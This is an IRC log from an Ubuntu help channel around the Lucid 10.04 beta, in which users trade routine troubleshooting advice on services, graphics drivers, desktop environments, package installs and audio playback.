pawhat is the "official" way to disable a service from the automatic startup ?14:07
palike with sysvconfig tools or so14:07
penguin42pa: That depends if it's sysv or upstart14:07
pai have lucid beta214:08
pai geuss upstart?14:08
penguin42pa: It depends on the individual service14:08
penguin42pa: Do you see the service you want in /etc/init or in /etc/init.d ?14:08
pammh.. let me check14:08
papenguin42, in init.d14:09
penguin42pa: OK, that's sysv stuff, so use update-rc.d14:09
paah thanks14:09
penguin42pa: e.g. update-rc.d foobar enable14:09
pafor upstart stuff, what should i use instead?14:09
penguin42pa: Not sure, as far as I can tell it seems to involve just removing stuff from /etc/init which seems a bit grim14:09
paoh ok14:11
pathanks , anyways : )14:11
ojiiwhen I share a internet connection with networkmanager (i share my wlan0 to my eth0) will it automatically start a DHCP server? because my other notebook tries to use DHCP over that eth0 connecton14:17
ojiinvm just set it to manual now14:19
melkorI cannot mount my Ipod shuffle.14:19
erghezimy microphone dont work in ubuntu lucid14:20
melkorI plug it in and I can see it under system->administration->disk utility, but there is no way to mount it.  It thinks it is an empty partition.14:20
melkorthe disk utility thinks the ipod is empty.14:21
Dr_Willispa upstart has files in ./etc/init now. just move or rename the file to disable a service. I move mine to /etc/init/DISABLED normally14:27
Dr_Willisor move for excample   service.conf to service.DONTRUN14:27
penguin42Dr_Willis: Can you try and replicate a bug for me? THis pptx file in OOo for me renders most of the first page in Greek: http://lhc-commissioning.web.cern.ch/lhc-commissioning/news-2010/presentations/week15/2010.04.18-summary%20830.pptx14:28
penguin42I'm told for others with earlier OOo it's OK14:28
Dr_Willisit crashes oowriter here14:30
penguin42ok, I'll file it - it's a bug either way14:30
Dr_Williswife is yelling... gotta go.14:30
terinjokesi think there's a typo in the AMD64 installer for beta214:32
krosonhi people very happy with lucid, congratulations to all developers14:32
penguin42terinjokes: Then file a bug against the ubiquity package14:32
ikoniaterinjokes: in what respect ?14:32
krosonid like to know if there is a way to watch pdf's directly from the browser, without downloading them14:32
krosonand without installing adobe reader14:33
ikoniakroson: there is pdf support, however it will have to download for you to read it14:33
ikoniakroson: you don't have to save it to the disk though14:33
ikonia!pdf | kroson14:33
ubottukroson: pdf is the Portable Document Format created by Adobe; viewable in GNU/Linux with xpdf/kpdf/okular/evince, and also adobe reader (free download, but closed source)14:33
terinjokesikonia: the first page of the slideshow, it says something like "While Ubuntu is installed, this slideshow will show you around." Shouldn't this be "While Ubuntu is *being* installed"14:33
krosonikonia: do you know what is mozplugger and if that will do what i want?14:34
ikoniaterinjokes: doesn't have to be14:34
ikoniakroson: no idea14:34
terinjokesikonia: the current way makes it seem like the slideshow will show you around after Ubuntu is installed14:34
krosoni can open it directly if i select the right option, but i remember some releases ago it open automatically14:34
krosonbut oh well, not a big question14:34
ikoniaterinjokes: no it doesn't14:34
ikoniaterinjokes: "while ubuntu is installed - I'll show you around"14:34
terinjokesyes, but Ubuntu isn't installed yet14:35
terinjokesit is installing14:35
ikoniaterinjokes: yes14:35
ikoniaso ?14:35
ikoniaam I missing your point ?14:35
terinjokesi do think so14:35
krosonnow, ive installed 10.04 beta 2 two hours ago14:35
krosonbut it took like 15 gb of hard drive14:35
ikoniakroson: so ? you told us that when you entred the channel14:35
ikoniathe install does not take up 15 GB of hard disk space, you can allocate as much as you want14:36
krosonikonia: i say this because of the disk space left i see in nautilus14:36
krosoni used my entire drive14:36
krosonand the option "erase the entire disk" of the ubuntu installer14:36
ikoniakroson: the only way for it to take 15GB is for you to put stuff on it AFTER the install, the install cannot install 15GB of data14:36
krosonikonia: just updated the packages :S14:37
ikoniakroson: that does not = 15GB14:37
krosonikonia: i dont know if the free space viewable in nautilus corresponds to the real one14:37
ikoniakroson: I suspect it is14:37
melkorikonia: it could14:37
ikoniamelkor: how ?14:37
krosonmaybe thee is also some swap space or temporary being used at /14:38
melkorkroson: you could try apt-get clean after updating enough.14:38
krosonjust what i think14:38
melkorafter I first installed lucid < 5 gigs.14:38
penguin42Dr_Willis: I reported it as #56595514:38
krosonyah what i wanted also to know is if there is one cleanup command or package for lucid14:38
penguin42kroson: system->administration->computer-janitor14:39
krosonmelkor: ill just install gparted to lose all my concerns14:39
krosonpenguin42: i read that app sometimes cleans what it shouldnt14:39
penguin42kroson: Hey well that's a bug14:39
krosonikonia: you were right14:42
krosoni used this tool to analyse disk usage14:42
krosonand just about 3.5 gb were used for ubuntu installation14:43
krosonplus about 500mb for updates, restricted extras and emesene14:43
Ken8521grr... why can i not get my grub menu to show?... i've tried holding Left Shift like was suggested.14:55
Ken8521Dr_Willis, any ideas?14:56
marijusanybody got problems with dualmonitor setup not beeing persistent on intel?14:57
ubottuLaunchpad bug 565305 in linux "display/monitor settings not persistent" [Undecided,New]14:58
ubottuLaunchpad bug 565971 in libipoddevice "I cannot mount my ipod shuffle. It shows up with the system>administration>disk utility; but it doesn't have any mountable partitions. (It actually does)" [Undecided,New]15:01
penguin42marijus: KDE or Gnome?15:02
pahow to remove the letter icon on the indicator applet?15:02
paor is there an applet with only volume control?15:02
marijuspenguin42: gnome15:02
penguin42marijus: Intersting, I've seen a long running KDE bug like that, but I've had it work on Gnome in the past - not tried it on Lucid though dual head15:04
marienzhas anyone here played with latencytop? I'm getting some odd stuttering in my audio output while doing things in X and am trying to use latencytop to tell me what's holding things up15:05
penguin42marijus: I don't think that problem is with the 'linux' package, but I'm not sure what it is with, it could be the X server xrandr stuff, the stuff that detects monitors or something as simple as teh GUI/Gnome stuff that records it15:05
marijuspenguin42: it worked very well until the kernel update to 2.6.32-16 where lot of stuff from 2.6.33 were backported15:06
marienzso far the most obvious oddity there is 162ms (!) max latency attributed to "Scheduler: waiting for cpu"15:06
marienz>100ms latency there seems like a lot15:06
penguin42marijus: Oh OK, seems a bit odd though15:06
duffydackjust me or is medibuntu down15:07
marijuspenguin42: well i guess its to late anyway for this bug to get fixed before release... :(15:08
penguin42marijus: Yeh I guess so - it's very rare for people to be complaining they can't turn OFF a monitor!15:09
marienzand I don't see the same on my laptop (it has that entry too but it's <20ms)15:09
penguin42marijus: You might try running xrandr, and then trying something like xrandr --output LVDS1 --off15:10
OxymoronZend Studio 7.1.2 with Lucid ... and X Error :( http://pastebin.com/uzMbrApm15:12
OxymoronIt started to happen for three days ago. Same error in Aptana and Eclipse as well.15:13
marijuspenguin42: the thing is i can turn it off with the display settings ui... but it does not remember the setting for the next login15:14
penguin42marijus: Then that really does sound like it's just the Gnome thing that restores the settings at login, even if it was triggered somehow by a kernel upgrade15:14
penguin42marijus: Can you pastebin the output of xrandr ?15:15
marijuspenguin42: http://pastebin.com/JSQ4VjKc15:17
marijuspenguin42: even running the command xrandr in terminal resets the setup... now i have to turn it of manually again :(15:18
kedmaneei starting lucid install soon. how can i avoid that grub2 is installing in master boot record?15:18
penguin42marijus: Oh *that* is weird; my guess is it's causing some redetection and it's going 'oh a new monitor - better use that'15:19
pais there an applet with only the sound preferences?15:19
penguin42marijus: I'd add that note about xrandr causing it to your bug report, that changes it quite a bit15:19
pawithout the mail preferences of the indicator applet?15:19
marijuspenguin42: ok... but it also gets reset by starting totem videoplayer or by restarting compiz15:20
penguin42marijus: OK add that; my guess is that anything which asks about the state of the monitor setup via xrandr triggers it; I've seen xrandr sometimes cause monitors to blink and I suspect it's related15:21
stalanybody know what i do with a libflashpalyer.so ?15:22
penguin42stal: Dump it in /usr/lib/mozilla/plugins15:23
ubottuLaunchpad bug 565989 in parcellite "favorite copies" [Undecided,New]15:23
stalpenguin42: thanks15:23
marijuspenguin42: ok ty, ill also add xrandr to the affected packages15:23
demifurorhey guys, does anyone have any tutorials for em so i can get my nvidia 8800 gts working in lucid?15:24
mawstAnyone have any recommendations for something better than fspot, that's not picasa?15:26
BUGabundomawst: humm not really15:26
BUGabundowhat do you need?15:26
mawstI think I'll try digiKam15:27
penguin42mawst: gimp is of course one option15:27
BUGabundopenguin42: gimp is a photo editor, not a album manager15:28
BUGabundoand I think mawst is looking for the 2nd15:28
demifurorcan anyone tell me how to install my nvidia 8800 gts on lucid?15:29
Red_Baronit's worth it to install 10.04 beta 2 or it's better to wait for final version?15:30
stalRed_Baron: yes it is15:30
stalit has light themes15:30
Red_Baronyou mean? :P15:30
stalnew themes15:30
Red_BaronsI must reinstall ubuntu15:30
Red_Baronnow i have 9.1015:30
Red_Baronso what do you say?15:31
staltry update-manager -d15:31
Red_Baron9.10 or 10.04 beta2?15:31
BPowerRed_Baron, I think the final version comes out in just under a week or two.  Everyone: will it be easy (and reliable) to upgrade from Beta 2 to the final version?  If so, might as well do it now as long as it's not a production server. Otherwise, I'd wait.15:31
tormodRed_Baron, if you have to install from scratch now anyway, try 10.0415:31
tormodif it does not work you can always install 9.10 instead15:31
BUGabundobeta2 is old already15:31
BUGabundoif you are doing a clean install, you can get a daily image15:32
Red_Baronwhat's a daily image?15:32
BUGabundoif you are upgrading from 9.10 you will get what ever is on your mirror at this moment15:32
BUGabundothat should be past beta215:32
Red_Baronthe newest version?15:32
BPowerHow can I figure out which version I'm on right now?15:32
BUGabundo!daily | Red_Baron15:32
ubottuRed_Baron: Daily builds of the CD images of the current development version of Ubuntu are available at http://cdimage.ubuntu.com/daily/current/ and http://cdimage.ubuntu.com/daily-live/current/15:32
BUGabundoBPower: update, and you will have the last your mirror provides15:33
Red_Baronso under beta 2 for ex. there are more versions?15:33
BUGabundoyou can check packages versions with15:33
tormodBPower, if you have run update today, you're on daily15:33
BUGabundo$ apt-cache policy PACKAGENAME15:33
uffohow i can enable partition mounting simple password protection that password is needed for mounting, thanks.15:33
BUGabundotormod: not exaclty, but close15:33
BUGabundouffo: look at encryptfs or encfs or truecript15:34
BPowerBUGabundo tormod: update from the Update Manager?15:34
BUGabundoBPower: from what? your current lucid?15:34
tormodpackages are updated every day, all the time. The "dailies" are a daily snapshot, the Beta was a particular daily that got extra testing, preceded by a short package update freeze15:35
uffoBUGabundo: i do not want encrypt but just password protect mounting, actually friend wants this because 9.10 had this way and he wats this back.15:36
Red_Baroni refer to iso image15:36
Red_Baronbeta 2 is the same now like it was 2 weeks ago?15:36
BUGabundouffo: I think you are really refering to encrypt, that asks an user on install if you want to encript HOME15:37
Red_Baroni refer  to the downloadable iso15:37
mawsthttp://yorba.org/shotwell/ <--- Looks better than fspot15:37
BUGabundoRed_Baron: ??15:37
tormodan iso image represents a snapshot of the archive15:38
uffoBUGabundo: not encrypt but you know that 9.10 wanted password if partition mount was needed that simple thing in current lucid, is there way for this ?15:39
Red_Baronok, i will ask the same thing more simplified :P15:39
Red_Baroni have downloaded 10.04 iso image about 2 weeks ago15:39
BUGabundoRed_Baron: you can use zsync to update that iso15:39
BUGabundowithout having to download the ALL image again15:39
BUGabundosaving you bandwith and time15:39
Red_Baronsould i install that or should i download again that iso cause it's newer version?15:39
BUGabundouffo: I don't understand what you are saying , sorry15:40
BUGabundoRed_Baron: are you doing a clean install?15:40
mirakis there some channel to discuss about raid ?15:41
ojiipenguin42, i rebooted now but still get the error about "Could not update ICEauthority file /home/jonas/.ICEauthority"15:42
penguin42ojii: do an ls -l of /home/jonas/.ICEauthority - what does it show?15:44
ojiipenguin42, -rw------- 1 root root 660 2010-04-18 14:22 /home/jonas/.ICEauthority15:45
BUGabundoRed_Baron: then you can try a daily15:46
BUGabundoif you find probs with it, you can try the beta iso you already have, or and early daily15:46
Red_Baronso it's better to download it now that image?15:46
penguin42ojii: Well there you go, some how you've ended up with it owned by root - nuke it and log and log back in15:46
penguin42mirak: What problems are you having with RAID - I did note there was an important warning in the Beta2 release nodes about a RAID bug15:47
mikebeechamhi guys...I've noticed with Lucid that, at login, I can change between Gnome and KDE.  Gnome is fine, however if I choose KDe then the screen goes black after it has entered the desktop...could anyone give a hint as to why?15:50
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yofelmikebeecham: does the 'run' app start if you press alt+f2? try running 'plasma-desktop' there15:51
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mikebeechamrighteo...so I logged into KDE...black screen.  I can open alt+f2 and type in plasma-desktop, but nothing happens.  I can also open alt+f2 and try settings, etc...all the windows I request (inc logout) appear, but still get black screen behind it...it's like there's no desktop there15:58
mikebeechamI also get a lot of knotify errors15:59
majnoonok got everything to work16:01
yofelmikebeecham: odd, how did you install KDE?16:01
majnoonexcept amarok no randomize the songs anymore :(16:01
majnoonyofel, istall kubuntu desktop16:02
mikebeechami havn't....I upgraded to Karmic, and within the login screen there's drop down menu that allows you to choose either 'safe' gnome, gnome, kde or one other....I'm assuming that choosing KDE will open up a KDE session?16:02
majnooncan have multiple desktop environments16:02
mikebeechamsorry, not karmic...Lucid16:02
mikebeechamI've upgraded to Lucid16:02
yofelmajnoon: *I* know that16:03
majnoon<---has gnome,kde and  xfce so far16:03
mikebeechamgnome runs for me fine, but KDE is giving me issues16:03
majnoonnm read question wrong :)16:03
yofelmikebeecham: really? it shouldn't list KDE if it's not installed16:03
mikebeechamstrange that I can open up windows, but cannot see a desktop16:03
yofelmajnoon: haha, nvm, I have KDE together with gnome and lxde here :P16:03
penguin42mikebeecham: My guess is that the window manager or something has died - I'd bet on 3d problems being the most likely issue16:04
mikebeechami probably wouldn't enjoy KDE anyway...I've used gnome since running linux16:04
majnoonyofel, depends ,he may have some kde programs installed (eg amarok) if so it WILL install kde libraries16:04
yofelmajnoon: you could be right there16:04
majnoon(that why if i install kde programs i install kde :)  )16:05
mikebeechamhow much space would installing kde take up?  and can I run them both to ascertain which one I'd like the most?16:05
yofelmikebeecham: well, if you really want to try kde you should make sure you have 'kubuntu-desktop' installed (or kde-full I guess)16:05
majnoonif fully installed you can mix and match no problem16:06
mikebeechamdoes KDE take a lot of space up?16:06
yofelmikebeecham: just run 'sudo aptitude install kubuntu-desktop' it should tell you how much space it will use before it does anything16:06
mikebeechamand would they use the same root folders?16:06
majnoondepends how fancy you get16:06
mikebeechamor do I need to partition?16:06
yofelmikebeecham: same16:06
mikebeechamdo you guys have a preference?16:06
* yofel uses KDE16:06
majnooni mix and match :)16:07
yofelmostly because I hate notify-osd16:07
majnoona lot of time i use fluxbox :)16:07
yofelthey work differently, depends on what you like more16:07
mikebeechamwell I've only really used gnome, so I've not yardstick to measure anything else by16:07
Gustavosupport in spanish ?16:08
majnoonyofel no so much any more16:08
majnoonthey tend to overlap a LOT16:08
mikebeechami'm a designer, so I tend to head for the aesthetic16:09
mikebeechami like to have whatever I use look nice16:09
yofelmajnoon: well, kubuntu and ubuntu will overlap, but they don't overlap that much16:09
majnoona lot of progs in both do16:09
majnoonmikebeecham, can go fancy in ANY desktop :P16:10
yofelmostly stuff like software properties, jockey and ooo are the same, but they differ a lot otherwize16:10
mikebeechammajnoon: I guess so...but I've come from a windows background, into gnome, so this is kind of all I know at the moment :D16:11
paul__do the xserver-xorg-core symbols not match up atm? ;/16:11
mikebeechamand between kde-look and deviantart I cant see anything that would make KDE look nice right now :(16:11
tenochslbi did some update last week on my hp pavillion dv 6000 and the wireless internet stopped working. I am using lucid lynx16:12
federicohola, acabo de actualizar a lucid 10.4 y tengo un problema con la tecla alt. Cuando la apreto se me minimizan las ventanas, cosa que no me pasaba antes de actualizar.16:12
federicoademรกs la tecla alt gr no me funciona16:12
Volkodavis medibuntu down ?16:12
BUGabundofederico: english only. thanks16:14
federicoi just updated tu lucid, and i have a problem with the alt key, when i press this key it minimizes the window16:14
BUGabundofederico: works fine for me16:14
BUGabundolaptop or desktop?16:14
federicoand the alt gr key doesn't work at al16:14
BUGabundousb or ps2?16:14
yofelmikebeecham: here's my desktop at the moment in KDE http://yofel.dyndns.org/pics/ext/kubuntu.png (ignore the window list at the top, got taken in the middle of the animation ^^)16:14
federicoit's a weird thing, i don know how to solve it16:15
mikebeechamyofel: I guess that would be an acquired taste :D16:15
mikebeechamit's not my thing, I'm afraid...too dark16:16
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duffydackhttp://www.omgubuntu.co.uk/2010/04/window-buttons-shift-order-again.html  this is something my system seems to have ignored.  my buttons have not changed..are they meant to?16:17
yofelmikebeecham: MY theme is dark, the default is white, maybe a tend light-grey16:17
majnoonmikebeecham, THAT the beauty of *nix start out slow then can really go nuts :)16:19
yofelmikebeecham: see here for a few default screenshots http://linuxexperimentation.blogspot.com/2010/02/kubuntu-lucid-review.html16:20
majnoonok yofel now how get new amarok to shuffle tunes ??16:23
howlymowlyhi poeple... short question: on my kubuntu 10.04 kde is not starting into compositing anymore.. I always have to enable it via the global shortcut... it is also enabled by default in my power settings.. but for some reason it does not work automatically..  any idea on this? or maybe this bug will bee resolved with the major rlease?16:23
yofelhowlymowly: what graphics card/driver are you using?16:24
majnoonok yofel now how get new amarok to shuffle tunes ??16:26
howlymowlybut that's not the problem....  yofel, I mean compositing works after all..  I just always have to enable it using the alt-shift-f12 shortcut...16:26
penguin42howlymowly: Which Intel exactly?16:27
howlymowly965gm   or some poeple use X3100 as the identification...16:28
majnooncan't shuffle playlists in amarok any more :(16:29
penguin42howlymowly: SO I don't know KDE stuff; but a bit of a google reveals there is some blacklist/whitelist stuff for enabling compositing; there is also apparently a 'self-check' that kwin runs and I'm guessing it's failing the selftext16:29
penguin42howlymowly: I'd check your .xsession-errors to see if there is any mention of compositing16:30
penguin42howlymowly: In particular check for a line like   kwin(26800): Compositing self-check failed, disabling compositing..16:30
mawstIS there a medibuntu repo for lucid?16:32
x1ohi, how do i integrate pidgin into the indicator applet?16:32
mawstBasically I'm just looking to get quicktime working.16:32
yofelmawst: medibuntu is there for lucid16:33
dupondjemawst: yofel: there is medibuntu indeed, but it seems down atm16:34
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howlymowlypenguin42: this is the only thing I found:   ProbedPCI:*(0:0:2:0) 8086:2a02:1028:026f Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller rev 12, Mem @ 0xf8000000/1048576, 0xd0000000/268435456, I/O @ 0x00001800/816:34
howlymowlyProbedPCI: (0:0:2:1) 8086:2a03:1028:026f Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller rev 12, Mem @ 0xf8100000/104857616:34
howlymowlyWarningOpen ACPI failed (/var/run/acpid.socket) (No such file or directory)16:34
howlymowlymaybe it has something to do with the open ACPI failed :)?16:34
mawstnm I have it solved.16:34
howlymowlyI mean compositing is beeing enabled in the power settings...16:34
howlymowlyhmm. i guess I'll jsut wait for a few days and see if the bug gets resolved with any updates..16:35
majnoonnow need to figure out how to shuffle playlists in amarok :(16:37
DASPRiDclick the shuffle button16:38
mikehhhi - I am having a weird problem with my wireless connection16:38
majnoonDASPRiD, it GONE in lucid version :(16:38
DASPRiDmajnoon, ah... amarok2 sucks anyway ;)16:39
mikehhwhen I restart the i386 version I have to do it twice before the wirless will connect16:39
penguin42howlymowly: I doubt it's the ACPI16:39
majnoonis there a way to grab jaunty version ??16:39
mikehhanyone come across similar problems16:39
agronholmmajnoon, /etc/issue?16:40
mikehhI am running - 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux - driver: rtl818016:45
mikehhwhen I restart my amd64 version I does not seem to have problems, but the i386 requires TWO restarts - it always seems to work on the second attempt16:46
penguin42mikehh: Well that sounds like a bug, (kernel?)16:47
penguin42mikehh: It's a good comparison to have16:47
mikehhI have 9.10 amd64, and 9.10 i386 and 9.04 amd64 (in separate / partitions same /home) and don't have problems with them16:49
mikehhI only have a wireless connection to the internet (on the othe side of the house)16:50
csilkLucid release party in London, I've found reference to it on the wiki but is there any more info?16:52
jesusmhello, anyone knows how can i change the docky icon color? the icon that open preferences panel for docky16:53
BUGabundocsilk: tried the loco teams wiki pages?16:53
lalalolwill 10.04 have en-CA?16:54
BUGabundowhere XX is your country16:54
dupondjemikehh: check the dmesg for errors ? :)16:54
MTughanlalalol: en-us doesn't work for you?16:55
lalalolMTughan, i prefer en-CA16:55
coc0nutCA for Canada?16:55
MTughanlalalol: So would I, but en-us works for me.16:55
MTughans/color/colour/ and s/neighbor/neighbour/, stuff like that.16:56
coc0nutI know, I live in Ireland.16:56
lalaloli wonder what you should choose being english-canadian, en-GB or en-US?16:56
coc0nutSurely en-GB would be what you're looking for then.16:56
majnoonfound the random play in amarok :P \o/16:56
majnoonno help so me no tell ;p16:57
mikehhdupondje - couldn't see any16:57
dupondjedoes somebody know if grub2 is working with dmraid now ?16:57
lalalolMTughan, are you english canadian?16:57
om26erBUGabundo, upstreamed, triaged?16:57
MTughanlalalol: Yes. In the Toronto area.16:57
majnoonhttps://answers.launchpad.net/ubuntu/+source/amarok/+question/98165  <--for shuffle info16:57
BUGabundoom26er: ?? I filled upstream if you mean parcelite wish bug16:58
lalalolMTughan, and you use en-US, why not en-GB?16:58
om26erBUGabundo, Yes16:58
MTughanlalalol: I could probably use either. Just never tried en-GB.16:58
MTughanlalalol: I do a lot of programming too, which almost always uses US spellings, so I have to see either way.16:59
lalalolMTughan, and is there a way so i can have color as colour and center as centre and defense as defence?16:59
coc0nutYeah, en-GB16:59
lalalolif i'd use en-GB, i'd need to change some verbs to -ize17:00
erghezii cant install gnome shell in ubuntu lucid17:00
Volkodavwhat's a better solution for incremental backups ( full system image ) will tar with saving permissions in directories suffice ?17:00
dupondjeupgrading from karmic to lucid, its ok to just change sources.list ?17:00
om26ererghezi, actually I am using it atm in Lucid17:00
ergheziom26er: synaptic give me error17:01
ergheziom26er: E: Unable to correct problems, you have held broken packages.17:01
ergheziE: Unable to lock the download directory17:01
om26ererghezi, I think its broken in Lucid17:01
om26erI am using a ppa17:01
ergheziom26er:  can you give me ppa?17:01
om26ererghezi,  can you give me ppa?17:02
om26ererghezi, https://launchpad.net/~ricotz/+archive/testing17:02
ergheziom26er: thx man17:03
om26ererghezi, :)17:03
om26erany one using xchat indicator?17:04
lalalolMTughan and coc0nut, will this make my system work in en-CA? http://manpages.ubuntu.com/manpages/lucid/man5/canadian-english-huge.5.html17:05
LademordAnyone who knows if it's possible to get screenlets to work on lucid alpha?17:08
dupondjeupgrading from karmic to lucid, its ok to just change sources.list ?17:08
MTughanlalalol: No, I don't think that's it.17:09
lalalolMTughan, wanna help me find a solution please?17:09
dartdogI have installed 10.04 after much pain,, and carefully been applying the "bulk" auto updates a few at a time and the last batch which included the open gl and some other similar drivers has now bricked the machine any suggestions on how to recover without a do over?17:12
fvsnot sure if this is lucid related - anyway Transmission Bittorent client downloaded ubuntu-studio iso image. When complete I went looking for it in the downloads folder (default). I can't find it - where could it possibly be?17:13
demifurorhow can i install ym 8800gts in lucid?17:13
Lademordfvs, you should be able to find that information in the torrent info in Transmission, I think17:13
fvsLademord, it points to home/user/Downloads17:14
Lademordfvs, hmm... that's strange. And the download is shown as completed, you say?17:15
LademordI have no idea then :)17:15
fvsLademord, yep, waited 2 hours for it to download :)17:15
dante123rhythmbox won't play ANYTHING (aloud that is)17:15
fvsLademord, showed progress, etc. A indications that it was downloading17:16
dartdoganyone with an idea how to backout the last bad update?17:16
om26erdante123, is it an mp3?17:16
dante123some are, and some are streaming (ubuntu one store)17:16
om26erdante123, sudo apt-get install gstreamer0.10-plugins-ugly ?17:17
joaopintoargh, mountall is really messed up17:17
lalaloldartdog, what i do is copy the things it'll install (using the terminal ofcourse) and paste it into a txt file or so, and if i dislike the update, i just give the command to remove the things i installed by copying the list into the terminal ;)17:17
dante123om26er but other players can play the same mp317:17
om26erdanfish, other players like?17:18
dante123clementine, movie player17:18
videorechnerHi I want to force my gpu to use a screen resolution, it doesnt find automatically , there is no xorg.conf how can I do that?17:18
om26erdante123, never heard of that but its possible that it might be using some other libraries17:19
dante123videorechner what brand of monitor (Acer perchance?)17:19
dante123okay, will try the uglies17:19
videorechnerSamsung LE37M87BDX/XEC17:20
videorechnerconnected via vga17:20
dante123gstreamer0.10-plugins-ugly is already the newest version.17:20
om26erdanfish, oh17:21
om26erdante123, oh17:21
delacdante123: do you have restricted-extras installed allready?17:21
om26erdante123, try to open the same file with totem17:21
delacdante123: hmm17:21
delacdante123: so it should work17:21
dartdog lalalol: well I'm late for that,, so I have a machine I can only start with the live cd.. and I'm not sure how I would manually remove the bad items,, if I could remember them,, is there an install log I can see?17:21
delacdante123: maybe something did go wrong on the installation17:22
dante123i believe this is a Rhythmbox error or pulseaudio or something as files play fine on other players17:22
lalaloldartdog, i think so, but i'm afraid i don't know where you can find that17:22
dante123i even reinstalled17:22
delacdante123: try reinstalling the ugly package17:22
dante123rhythmbox that is (not ubuntu)17:22
JoshuaLis it possible to add the info provided by ubuntu-bug to an exsisting bug?17:22
dante123already have uglies17:22
delacdante123: reinstall17:22
om26erdante123, sudo apt-get purge ubuntu-restricted-extras ;sudo apt-get install ubuntu-restricted-extras might install some libraries that might have been removed in the past (might)17:23
delacdante123: you can mark it for reinstallation17:23
dartdogso in short no way to backout a bad update?? seems sort of crazy Any way to remove items from the auto update list (for good?)17:25
lalaloldartdog, maybe sudo apt-get autoremove, idk man17:25
dante123delac just did what u said, and testing now....standby17:26
videorechnerdante123 do you have any ideas about my problem?17:26
demifurorhwot o isntall nvidia in lucid lync?17:26
dante123sorry, state the problem again17:26
yofeldemifuror: install it from jockey (Hardware Drivers)17:27
dante123no good delac17:27
dante123same thing17:27
delacdante123: hmm17:27
yofelvideorechner: there is no xorg.conf by default, but you can write one yourself17:28
videorechnerHi I want to force my gpu to use a screen resolution, it doesnt find automatically , there is no xorg.conf how can I do that?17:28
delacdante123: does rhythmbox give some kind of error when you try to play mp3's?17:28
dante123oh yeah, okay.....what brand of monitor (flat panel) and what resolution u want?17:28
demifuroryofel: it says the driver is activated but not in use? how do i use it?17:28
dante123videorechner (are u using nvidia driver or standard driver)?17:29
videorechnersadly, I dont know what I would have to add to the file17:29
delacvideorechner: system->preferences->display17:29
videorechnerdelac 1920x1080 doesnt show up17:30
arrrghhhhow can i install jdk?  i try installing sun-java6-jdk, and it says there's no candidate version...17:30
delacvideorechner: ah17:30
yofeldemifuror: you installed the driver and rebooted, what do you have now?17:30
yofeldemifuror: low graphics mode, or just no 3d, or...?17:30
dante123videorechner, I had an acer that would not go above 13xx X xxxx and I wanted 1440 x 900....I had to edit xorg.conf and add refresh rates before higher resolutions would show up...17:31
demifuroryofel: i cant use the advanced effects, and i cant scroll some pages smoothly, and its just not as nice as it could be haha17:31
dante123Are there restricted video drivers for your gpu17:31
nipasHello ! How can I automount ntfs partitions (on startup) in Lucid ??17:31
yofeldemifuror: 'lsmod | grep nvidia' gives nvidia?17:31
demifurori used to use envy in old ubuntus, but i dont think i can for lucid17:31
dante123gotta go....back later 17:31
videorechnerthanks for your help17:32
demifuroryofel: no, gives nothing17:32
yofeldemifuror: the hardware drivers app does everything envy does17:32
yofeldemifuror: ok, and lsmod | grep nouveau ?17:32
demifuroryeah that gives me stuff17:32
yofeldemifuror: ok, you DID reboot after installing the drivers?17:33
demifuroryofel:i havent installed any drivers yet, how do i install them?17:33
yofeldemifuror: er... go to System->Administration->Hardware Drivers and install the recommended driver17:33
demifuroryofel:on the recommended one, it says this driver is activated but not in use, how do i make it use it?17:34
yofeldemifuror: where did you get the 'driver activated but not in use' from?17:34
yofeldemifuror: ok, how did it get installed? did you upgrade?17:35
demifuroryofel: upgrade from what? when i installed lucid, it was just like that from teh get go, activated but not in use17:35
yofeldemifuror: o.O, that shouldn't be the case... the driver clearly isn't activated if you're using nouveau17:36
arrrghhhso I read "For Ubuntu 10.04 LTS, the sun-java6 packages have been dropped from the Multiverse section of the Ubuntu archive. It is recommended that you use openjdk-6 instead." but openjdk-6 gives me the same errors.  no candidate version.17:36
yofeldemifuror: can you deactivate it and install it again?17:36
demifuroryofel: could it be some kind of bug seeing as this is beta 2?17:36
demifuroryofel:removing driver now17:37
yofeldemifuror: could be (in the hardware drivers app)17:37
demifuroryofel: now the wee circle beside is greyed out, do i just activate it again and see if it works?17:37
yofeldemifuror: yes, try it17:38
demifurordownloading and installing driver...17:38
yofelarrrghhh: no candidate version? I can install openjdk-6-jre fine here17:38
arrrghhhyofel, i have multiverse and universe enabled... is there something else i need to do?17:39
yofelno, as openjdk is in Main17:39
yofel!info openjdk-6-jre17:39
ubottuopenjdk-6-jre (source: openjdk-6): OpenJDK Java runtime, using Hotspot JIT. In component main, is extra. Version 6b18~pre4-1ubuntu1 (lucid), package size 252 kB, installed size 820 kB17:39
majnoongot nvidia working,got sound working got amarok running ok now (ME HAPPY)17:39
BUGabundoooopss http://www.alsa-project.org17:41
arrrghhhyofel, "No candidate version found for openjdk-6-jre"17:41
BUGabundocrimsun: did alsa forgot to renew their domain ?17:41
yofelarrrghhh: run 'sudo apt-get update'17:41
yofelBUGabundo: lol17:41
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arrrghhhyofel, apparently my sources.list was hosed.  i just did an update like 20 minutes ago, not sure how that happened... thanks!17:46
harry-houdini1hello does anyone know if the  raid bug or the check disk bug were fixed yet17:54
jpdsRAID or check disk bug?17:55
arrrghhhyofel, i guess my real problem is the java_home environment variable... what should i set it to for openjdk?17:55
jpdsDo you have a bug number for that?17:55
harry-houdini1sorry thought it was a common one I will have to find the bug reports again...17:56
Mike1_my tty0 somehow went missing โ€ฆ how can I get it back?17:57
Mike1_or is it โ€œnormalโ€ in lucid?17:57
Mike1_and how can I remove plymouth?17:59
Ian_Corneyou canot17:59
Mike1_how can I at least disable it?18:00
vexati0nhelp! how do i tell pulseaudio to listen to an input one one device and let me hear it on speakers attached to another device?18:01
vexati0nor is it too dumb for that :(18:01
Ian_CorneMike1_: check the run scripts18:01
Dr_Willis vexati0n  you mean 2 differnt pc's or sound cards?18:02
mbrigdanWould anyone know why upgrading to Lucid would want to install apache?18:03
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vexati0nDr_Willis, 2 sound cards, same pc.18:03
yofelarrrghhh: not sure, I had issues with openjdk in eclipse and in firefox, so I'm using sun-java6 now18:04
ReckonyDr. Willis, earlier this morning you mentioned a services.conf file, didn't you?18:04
espen77hmm....desktop sometimes freezes when moving files from local hdd to nfs mount using command-line....anyone else experience this?18:05
Dr_Willisupstart configs --> /etc/init/WHATEVER.conf18:05
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Reckonthanks mate18:08
